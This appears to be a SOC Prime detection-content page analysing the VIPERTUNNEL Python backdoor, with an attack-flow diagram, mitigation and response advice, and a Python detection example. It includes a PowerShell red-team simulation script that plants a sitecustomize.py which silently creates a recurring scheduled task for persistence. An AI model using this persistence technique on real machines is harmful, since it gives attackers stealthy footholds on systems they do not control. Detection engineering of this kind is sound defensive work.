SOC Prime Bias: High

14 Apr 2026 18:38

VIPERTUNNEL Python Backdoor: A Deep Dive

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report details the analysis of VIPERTUNNEL, a Python-based backdoor that achieves persistence via a scheduled task and leverages a malicious sitecustomize.py to load an obfuscated DLL. The DLL decrypts and executes a multi-stage payload that establishes a SOCKS5 proxy to a hard-coded C2 server over port 443. The infrastructure is linked to UNC2165 and EvilCorp and shares obfuscation techniques with the ShadowCoil credential stealer.

Investigation

Researchers examined Autoruns output, identified the scheduled task 523135538, and traced execution to C:\ProgramData\cp49s\pythonw.exe and its sitecustomize.py module. Reverse engineering of b5yogiiy3c.dll revealed layered obfuscation, decryption routines, and a final stage that creates a SOCKS5 tunnel using hard-coded credentials. Infrastructure analysis linked multiple domains and IPs to the campaign and highlighted the use of the Pyramid C2 framework.

Mitigation

Deploy endpoint detection that monitors for pythonw.exe execution without arguments, creation of scheduled tasks with numeric names, and the presence of sitecustomize.py in unexpected locations. Block outbound traffic to known C2 domains and ports 443/8000 with anomalous HTTP 401 responses. Implement strict application control to prevent unauthorized Python modules from loading.

Response

Alert on the creation of the suspicious scheduled task and the execution of pythonw.exe without a script. Quarantine affected hosts, collect memory dumps, and hunt for the characteristic class names and hard‑coded credentials. Invalidate the compromised credentials and disrupt the C2 infrastructure identified in the report.

Attack Flow

    graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef process fill:#c2f0c2
    classDef tool fill:#ffeb99
    classDef file fill:#d9d9d9
    classDef component fill:#cce5ff
    classDef c2 fill:#f4b084
    classDef credential fill:#ffe6e6
    %% Technique nodes
    tech_persistence["<b>Technique</b> – T1053.005 Scheduled Task : Persistence<br/><b>Description</b>: Creates or modifies a scheduled task to execute malicious code at system boot or on a schedule."]
    class tech_persistence technique
    tech_obfuscation["<b>Technique</b> – T1027 Obfuscated Files or Information<br/><b>Description</b>: Uses encoding, compression and cryptographic primitives to hide malicious code."]
    class tech_obfuscation technique
    tech_deobfuscate["<b>Technique</b> – T1140 Deobfuscate/Decode Files or Information<br/><b>Description</b>: Decodes Base85 and other transformations to recover next-stage code."]
    class tech_deobfuscate technique
    tech_compile["<b>Technique</b> – T1027.004 Compile After Delivery<br/><b>Description</b>: Compiles recovered code in memory using compile() and exec()."]
    class tech_compile technique
    tech_reflect["<b>Technique</b> – T1620 Reflective Code Loading<br/><b>Description</b>: Loads and runs code directly from memory without writing to disk."]
    class tech_reflect technique
    tech_proxy_ext["<b>Technique</b> – T1090.002 Proxy External Proxy<br/><b>Description</b>: Establishes an external SOCKS5 proxy to forward traffic."]
    class tech_proxy_ext technique
    tech_proxy_int["<b>Technique</b> – T1090.001 Proxy Internal Proxy<br/><b>Description</b>: Uses internal proxy components to relay traffic."]
    class tech_proxy_int technique
    tech_tunnel["<b>Technique</b> – T1572 Protocol Tunneling<br/><b>Description</b>: Encapsulates victim traffic inside SOCKS5 tunnel."]
    class tech_tunnel technique
    tech_encrypted["<b>Technique</b> – T1573 Encrypted Channel<br/><b>Description</b>: Encrypts C2 communication with ChaCha20/XOR."]
    class tech_encrypted technique
    tech_webc2["<b>Technique</b> – T1102 Web Service<br/><b>Description</b>: Communicates with C2 over HTTPS using custom Pyramid service."]
    class tech_webc2 technique
    tech_nonstd["<b>Technique</b> – T1571 Non-Standard Port<br/><b>Description</b>: Uses port 443 to blend with legitimate HTTPS traffic."]
    class tech_nonstd technique
    %% Process and tool nodes
    process_task["<b>Process</b> – Scheduled Task 523135538<br/><b>Command</b>: C:\ProgramData\cp49s\pythonw.exe"]
    class process_task process
    tool_pythonw["<b>Tool</b> – pythonw.exe<br/><b>Role</b>: Executes Python scripts without a console window."]
    class tool_pythonw tool
    %% File nodes
    file_sitecustomize["<b>File</b> – sitecustomize.py<br/><b>Purpose</b>: Auto-imports and triggers DLL execution."]
    class file_sitecustomize file
    file_dll["<b>File</b> – b5yogiiy3c.dll<br/><b>Type</b>: Obfuscated Python payload."]
    class file_dll file
    %% Component nodes
    component_wire["<b>Component</b> – Wire class<br/><b>Function</b>: Implements SOCKS5 client."]
    class component_wire component
    component_relay["<b>Component</b> – Relay class<br/><b>Function</b>: Handles traffic forwarding."]
    class component_relay component
    component_commander["<b>Component</b> – Commander class<br/><b>Function</b>: Manages C2 commands."]
    class component_commander component
    %% C2 and credential nodes
    c2_server["<b>C2 Server</b> – Pyramid service<br/><b>Response</b>: HTTP 401 Basic realm=Proxy"]
    class c2_server c2
    credentials["<b>Credentials</b> – AnyUser / AnyPassword<br/><b>Use</b>: Authenticates with proxy."]
    class credentials credential
    %% Connections
    tech_persistence -->|creates| process_task
    process_task -->|launches| tool_pythonw
    tool_pythonw -->|imports| file_sitecustomize
    file_sitecustomize -->|loads| file_dll
    file_dll -->|uses| tech_obfuscation
    file_dll -->|triggers| tech_deobfuscate
    tech_deobfuscate -->|leads to| tech_compile
    tech_compile -->|leads to| tech_reflect
    tech_reflect -->|executes| component_wire
    component_wire -->|works with| component_relay
    component_relay -->|controls| component_commander
    component_commander -->|contacts| c2_server
    c2_server -->|uses| tech_proxy_ext
    c2_server -->|uses| tech_proxy_int
    c2_server -->|tunnels via| tech_tunnel
    c2_server -->|encrypts channel| tech_encrypted
    c2_server -->|communicates over| tech_webc2
    c2_server -->|uses port| tech_nonstd
    component_commander -->|auth with| credentials
    %% Apply classes
    class tech_persistence,tech_obfuscation,tech_deobfuscate,tech_compile,tech_reflect,tech_proxy_ext,tech_proxy_int,tech_tunnel,tech_encrypted,tech_webc2,tech_nonstd technique
    class process_task process
    class tool_pythonw tool
    class file_sitecustomize,file_dll file
    class component_wire,component_relay,component_commander component
    class c2_server c2
    class credentials credential

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    The adversary first drops a malicious sitecustomize.py into the same directory as pythonw.exe. Python automatically imports sitecustomize.py on interpreter start-up, allowing the attacker to execute arbitrary code without passing a script path on the command line. By launching pythonw.exe without any arguments, the process creation event contains an empty CommandLine field, satisfying the Sigma rule's conditions. The payload establishes a scheduled task for persistence, ensuring the interpreter runs at system startup and thereby maintaining a long-term foothold.

  • Regression Test Script:

    # -------------------------------------------------
    # Setup malicious sitecustomize.py
    # -------------------------------------------------
    $payloadPath = 'C:\ProgramData\cp49s\sitecustomize.py'
    $exePath     = 'C:\ProgramData\cp49s\pythonw.exe'
    
    # Ensure the target folder exists
    New-Item -ItemType Directory -Path (Split-Path $exePath) -Force | Out-Null
    
    # Deploy a benign copy of pythonw.exe for the test (if not already present)
    # In a real red-team scenario this would be the legitimate interpreter
    if (-Not (Test-Path $exePath)) {
        # Copy from system Python installation (adjust path as needed).
        # A lone pythonw.exe still needs its python3x.dll to be resolvable
        # (next to it or on PATH), otherwise the process will not start.
        Copy-Item 'C:\Python39\pythonw.exe' $exePath
    }
    
    # Create malicious sitecustomize.py (creates a scheduled task as proof-of-concept)
    @"
    import subprocess, sys
    # Create a scheduled task that runs pythonw.exe every minute (persistence)
    subprocess.run(['schtasks', '/Create', '/SC', 'MINUTE', '/MO', '1',
                '/TN', 'UpdateTask', '/TR', sys.executable])
    "@ | Set-Content -Path $payloadPath -Encoding UTF8
    
    # -------------------------------------------------
    # Trigger the detection (malicious execution)
    # -------------------------------------------------
    # No -ArgumentList here: the interpreter must start with an empty command
    # line, and Start-Process rejects an empty string for that parameter anyway.
    Write-Host '[+] Launching pythonw.exe with empty command line...'
    Start-Process -FilePath $exePath -WindowStyle Hidden
    
    # Wait a short period for the scheduled task to be created (optional)
    Start-Sleep -Seconds 5
    
    Write-Host '[+] Payload executed. Check your SIEM for the alert.'
    # -------------------------------------------------
    # End of script
    # -------------------------------------------------
  • Cleanup Commands:

    # Remove the malicious sitecustomize.py
    Remove-Item -Path 'C:\ProgramData\cp49s\sitecustomize.py' -Force -ErrorAction SilentlyContinue
    
    # Delete the scheduled task created by the payload
    schtasks /Delete /TN UpdateTask /F
    
    # Optionally remove the copied pythonw.exe (if it was a test copy)
    # Remove-Item -Path 'C:\ProgramData\cp49s\pythonw.exe' -Force
    
    Write-Host '[+] Cleanup complete.'
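As an added example (not code from the SOC Prime report or the VIPERTUNNEL analysis), the following Python applies the three host-side checks listed under Mitigation to constructed Sysmon-style records of the kind the regression test above produces: pythonw.exe started with no arguments (empty CommandLine, or a CommandLine that is only the image path), a scheduled task whose name is all digits, and sitecustomize.py outside a Python Lib or site-packages tree. The event IDs, field names, Windows paths and sample records are assumptions constructed for the example.

```python
# Added example, not part of the SOC Prime report: Mitigation checks over constructed Sysmon-style records.
import ntpath

# Constructed sample telemetry (not real logs). EventID 1 = process creation
# (Sysmon), EventID 4698 = scheduled task created (Security log).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\ProgramData\cp49s\pythonw.exe", "CommandLine": ""},
    {"EventID": 1, "Image": r"C:\ProgramData\cp49s\pythonw.exe",
     "CommandLine": r'"C:\ProgramData\cp49s\pythonw.exe"'},
    {"EventID": 1, "Image": r"C:\Python39\pythonw.exe",
     "CommandLine": r'"C:\Python39\pythonw.exe" C:\tools\backup.py'},
    {"EventID": 4698, "TaskName": r"\523135538"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
]

def pythonw_without_script(ev):
    """pythonw.exe started with no arguments: CommandLine empty or just the image path."""
    if ev.get("EventID") != 1:
        return False
    if ntpath.basename(ev.get("Image", "")).lower() != "pythonw.exe":
        return False
    cmd = ev.get("CommandLine", "").strip().strip('"').lower()
    return cmd == "" or cmd == ev["Image"].lower()

def numeric_task_name(ev):
    """Task whose leaf name is all digits, like task 523135538 in the report."""
    if ev.get("EventID") != 4698:
        return False
    return ev.get("TaskName", "").rsplit("\\", 1)[-1].isdigit()

def sitecustomize_out_of_place(path):
    """sitecustomize.py belongs in a Python Lib or site-packages tree; elsewhere is suspect."""
    if ntpath.basename(path).lower() != "sitecustomize.py":
        return False
    parts = {p.lower() for p in path.split("\\")}
    return not ({"lib", "site-packages"} & parts)

def triage(events, files):
    """Return (rule, evidence) pairs for every record or path that matches a check."""
    hits = []
    for ev in events:
        if pythonw_without_script(ev):
            hits.append(("pythonw_no_script", ev["Image"]))
        if numeric_task_name(ev):
            hits.append(("numeric_task_name", ev["TaskName"]))
    for f in files:
        if sitecustomize_out_of_place(f):
            hits.append(("sitecustomize_outside_lib", f))
    return hits
```

The Lib/site-packages test is a location heuristic only; pair it with the process and task checks rather than alerting on it alone.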